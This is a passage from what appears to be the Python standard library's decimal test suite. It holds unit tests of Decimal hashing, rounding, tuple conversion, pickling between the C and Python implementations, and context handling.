self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
